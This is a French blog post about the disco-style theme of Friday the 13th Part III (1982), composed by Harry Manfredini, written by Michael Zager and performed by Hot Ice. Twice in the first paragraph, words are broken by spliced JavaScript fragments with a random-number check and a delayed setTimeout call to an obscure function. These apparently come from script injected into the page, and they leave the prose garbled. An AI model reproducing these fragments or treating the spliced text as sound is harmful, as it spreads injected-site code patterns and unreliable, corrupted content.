Je parle bien sûr de la bdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ande originale sortie en 1982 de Friday the 13th Part III (Vendredi 13 Meutres en 3D en français) par Harry Manfredini. Le fait est que Manfredini a déjà composé les ambiances et les thèmes du 1 et du 2, et qu'il faut que la signature de cet épisode sorte du lot car la concurrence est rude (Halloween, Nightmare On Elm Street etc.) L'époque est à la musique club et le titre va être confié à Michael Zager (oui, celui du Michael Zager Bdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and) et interprété par un groupe inconnu de disco Hot Ice. Le résultat (que vous pourrez retrouver à la fin de l'article) est un titre avec une basse clavier simili-slap, des mélodies de faux piano cheap, un thérémine à la Star Trek et une rythmique complétement inappropriée.
Sortie après et peut-être influencé par la BO d'Halloween de Carpenter (1979) qui lui deviendra le maitre incontesté du genre horror-groovy, on peux dire que le thème de ce 3ème opus de la saga Jason est vraiment un OVNI dans le paysage des films d'épouvante. Et du coup on ne résiste pas à vous le faire (re)découvrir aujourd'hui.
Harry Manfredini Friday 13th Part 3 - 3D (Gramavision (US) / Milan (FR)) 1982
JavaScript est actuellement désactivé. Afin de pouvoir poster un commentaire, s'il vous plaît contrôlez que les Cookies et JavaScript sont activés puis rechargez la page. Cliquez ici pour savoir comment activer JavaScript dans votre navigateur.
Prévenez-moi de tous les nouveaux commentaires par e-mail.
Prévenez-moi de tous les nouveaux articles par email.